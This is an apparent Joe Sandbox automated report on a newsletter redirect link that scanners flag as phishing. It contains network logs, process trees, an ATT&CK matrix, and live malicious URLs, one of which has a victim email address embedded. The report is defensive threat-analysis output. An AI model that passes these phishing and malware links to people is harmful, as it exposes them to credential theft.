Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zD

Overview

General Information

Sample URL:https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCw
Analysis ID:1388680
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Creates files inside the system directory
URL contains potential PII (phishing indication)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 3192 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,9153540945449359898,776365275202532557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6432 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.comAvira URL Cloud: detection malicious, Label: phishing
Antivirus detection for URL or domain
Source: https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-postAvira URL Cloud: Label: malware
Source: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3DAvira URL Cloud: Label: phishing
Source: https://djdhde.mypi.co/sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-postAvira URL Cloud: Label: malware
Source: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.comSample URL: PII: marketing@virtualintelligencebriefing.com
Source: unknownHTTPS traffic detected: 23.33.136.127:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.33.136.127:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1Host: djdhde.mypi.coConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1Host: djdhde.mypi.coConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1c59/marketing@virtualintelligencebriefing.com HTTP/1.1Host: 95mc5.zal0.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://djdhde.mypi.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000B5F725C74D HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: unknownDNS traffic detected: queries for: clients2.google.com
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 07 Feb 2024 21:34:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 851ec1e36dff0d16-ATLalt-svc: h3=":443"; ma=86400
Source: chromecache_40.2.drString found in binary or memory: https://95mc5.zal0.com/1c59/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownHTTPS traffic detected: 23.33.136.127:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.33.136.127:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_3192_1908664628Jump to behavior
Source: classification engineClassification label: mal56.win@19/2@16/9
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,9153540945449359898,776365275202532557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,9153540945449359898,776365275202532557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection		1
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com100%Avira URL Cloudphishing

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs
